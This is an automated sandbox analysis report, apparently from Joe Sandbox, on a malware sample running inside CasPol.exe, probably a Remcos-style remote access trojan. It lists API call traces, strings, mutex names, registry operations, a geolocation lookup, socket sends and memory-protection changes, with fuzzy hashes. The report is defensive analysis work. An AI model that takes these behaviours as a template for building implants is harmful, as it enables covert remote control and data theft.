                                                                                                                    control_flow_graph 1547 41a52b-41a56a call 401faa call 43a89c InternetOpenW InternetOpenUrlW 1552 41a56c-41a58d InternetReadFile 1547->1552 1553 41a5b3-41a5b6 1552->1553 1554 41a58f-41a5af call 401f86 call 402f08 call 401eea 1552->1554 1555 41a5b8-41a5ba 1553->1555 1556 41a5bc-41a5c9 InternetCloseHandle * 2 call 43a897 1553->1556 1554->1553 1555->1552 1555->1556 1561 41a5ce-41a5d8 1556->1561
                                                                                                                    APIs
                                                                                                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                                                                                                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                                                                                                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                                                                                                                    Strings
                                                                                                                    • http://geoplugin.net/json.gp, xrefs: 0041A55E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                    • String ID: http://geoplugin.net/json.gp
                                                                                                                    • API String ID: 3121278467-91888290
                                                                                                                    • Opcode ID: 77afb7aa6b705f4675ab5a767cf1234564151b956219bab6c9cba43669e19d49
                                                                                                                    • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                                                                                                                    • Opcode Fuzzy Hash: 77afb7aa6b705f4675ab5a767cf1234564151b956219bab6c9cba43669e19d49
                                                                                                                    • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1565 1000c7e6-1000c7ed GetModuleHandleA 1566 1000c82d 1565->1566 1567 1000c7ef-1000c7fe call 1000c803 1565->1567 1568 1000c82f-1000c833 1566->1568 1576 1000c800-1000c80b GetProcAddress 1567->1576 1577 1000c865 1567->1577 1570 1000c872 call 1000c877 1568->1570 1571 1000c835-1000c83d GetModuleHandleA 1568->1571 1574 1000c83f-1000c847 1571->1574 1574->1574 1578 1000c849-1000c84c 1574->1578 1576->1566 1580 1000c80d-1000c81a VirtualProtect 1576->1580 1579 1000c866-1000c86e 1577->1579 1578->1568 1581 1000c84e-1000c850 1578->1581 1587 1000c870 1579->1587 1583 1000c82c 1580->1583 1584 1000c81c-1000c82a VirtualProtect 1580->1584 1585 1000c852-1000c854 1581->1585 1586 1000c856-1000c85e 1581->1586 1583->1566 1584->1583 1588 1000c85f-1000c860 GetProcAddress 1585->1588 1586->1588 1587->1578 1588->1577
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                      • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                      • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                      • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2099061454-0
                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                    • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                    • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1590 4126d2-4126e9 RegCreateKeyA 1591 412722 1590->1591 1592 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1590->1592 1593 412724-412730 call 401eea 1591->1593 1592->1593
                                                                                                                    APIs
                                                                                                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                    • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                    • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateValue
                                                                                                                    • String ID: HgF$pth_unenc
                                                                                                                    • API String ID: 1818849710-3662775637
                                                                                                                    • Opcode ID: 2f9e7c41ae4c253e06ea481f6c6fb5208ee03e4d5917cb70f9fd9782705e0590
                                                                                                                    • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                                    • Opcode Fuzzy Hash: 2f9e7c41ae4c253e06ea481f6c6fb5208ee03e4d5917cb70f9fd9782705e0590
                                                                                                                    • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                      • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                      • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                      • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                      • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2099061454-0
                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                    • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                    • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                    • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                    • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2152742572-0
                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                    • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                    • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                    APIs
                                                                                                                    • send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    • WaitForSingleObject.KERNEL32(000002CC,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                    • SetEvent.KERNEL32(000002CC,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: EventObjectSingleWaitsend
                                                                                                                    • String ID: LAL
                                                                                                                    • API String ID: 3963590051-3302426157
                                                                                                                    • Opcode ID: 601a9b8c2c127482c455f580d42fc3fb0a9ca8dc5f908a1857f109b89823151f
                                                                                                                    • Instruction ID: 8f6f307dcfa5e25975ae7096dc57d747427bb4b25c3784bf73346896dbb4b4c1
                                                                                                                    • Opcode Fuzzy Hash: 601a9b8c2c127482c455f580d42fc3fb0a9ca8dc5f908a1857f109b89823151f
                                                                                                                    • Instruction Fuzzy Hash: B82123B29001196BCF04ABA5DC96DEE777CBF54358B00413EF916B21E1EA78AA04D6A4
                                                                                                                    APIs
                                                                                                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                    • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateValue
                                                                                                                    • String ID: TUF
                                                                                                                    • API String ID: 1818849710-3431404234
                                                                                                                    • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                    • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                    • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                    • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                                    APIs
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3360349984-0
                                                                                                                    • Opcode ID: 49c504ab32c4945161b993ea5bba395d7d0c584598e1a7e56abe500eb944de67
                                                                                                                    • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                                    • Opcode Fuzzy Hash: 49c504ab32c4945161b993ea5bba395d7d0c584598e1a7e56abe500eb944de67
                                                                                                                    • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041B68A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleReadSize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3919263394-0
                                                                                                                    • Opcode ID: e3fa97375f397a9adf851a325cc2d4fe92c4ff8b8f1d8781d8034c29ac5bd751
                                                                                                                    • Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
                                                                                                                    • Opcode Fuzzy Hash: e3fa97375f397a9adf851a325cc2d4fe92c4ff8b8f1d8781d8034c29ac5bd751
                                                                                                                    • Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CountEventTick
                                                                                                                    • String ID: >G
                                                                                                                    • API String ID: 180926312-1296849874
                                                                                                                    • Opcode ID: 5276d3f50751fa3cace36b7362d0e59a1d363df6b5e66a242b1f63c2d2d3302c
                                                                                                                    • Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
                                                                                                                    • Opcode Fuzzy Hash: 5276d3f50751fa3cace36b7362d0e59a1d363df6b5e66a242b1f63c2d2d3302c
                                                                                                                    • Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E
                                                                                                                    APIs
                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                    • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateErrorLastMutex
                                                                                                                    • String ID: Rmc-B3IX49
                                                                                                                    • API String ID: 1925916568-3351567749
                                                                                                                    • Opcode ID: 296d9643a91431cf214b808cae9b7d77365ac793ad5cac5481aac8ac9a10b333
                                                                                                                    • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                                    • Opcode Fuzzy Hash: 296d9643a91431cf214b808cae9b7d77365ac793ad5cac5481aac8ac9a10b333
                                                                                                                    • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3677997916-0
                                                                                                                    • Opcode ID: 8bdb47dcc075b90602d862ed2636d4bb920ab298b1725c427e8c8ce9e7e6604e
                                                                                                                    • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                                    • Opcode Fuzzy Hash: 8bdb47dcc075b90602d862ed2636d4bb920ab298b1725c427e8c8ce9e7e6604e
                                                                                                                    • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3677997916-0
                                                                                                                    • Opcode ID: e356916b1740155a69653a68473027dca2ca6835ab0d3846d735c0fff301d5eb
                                                                                                                    • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                                                    • Opcode Fuzzy Hash: e356916b1740155a69653a68473027dca2ca6835ab0d3846d735c0fff301d5eb
                                                                                                                    • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3677997916-0
                                                                                                                    • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                    • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                    • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                    • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                                    • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3677997916-0
                                                                                                                    • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                    • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                                    • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                    • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: xAG
                                                                                                                    • API String ID: 176396367-2759412365
                                                                                                                    • Opcode ID: 3cd24ee7cf2bbd971f19c3cfa9fc21255a7d7322a241340b9fd7b504d1626de8
                                                                                                                    • Instruction ID: 06a27fc39790a6443aa461e0e984232ee7603be4cd8470566e0b89af9a4a2a71
                                                                                                                    • Opcode Fuzzy Hash: 3cd24ee7cf2bbd971f19c3cfa9fc21255a7d7322a241340b9fd7b504d1626de8
                                                                                                                    • Instruction Fuzzy Hash: FE1163329002059FCB15FF66D8969EF77A4EF64314B10453FF842622E2EF38A955CB98
                                                                                                                    APIs
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A969
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 1890195054-2766056989
                                                                                                                    • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                    • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                                    • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                    • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 0044B9EF
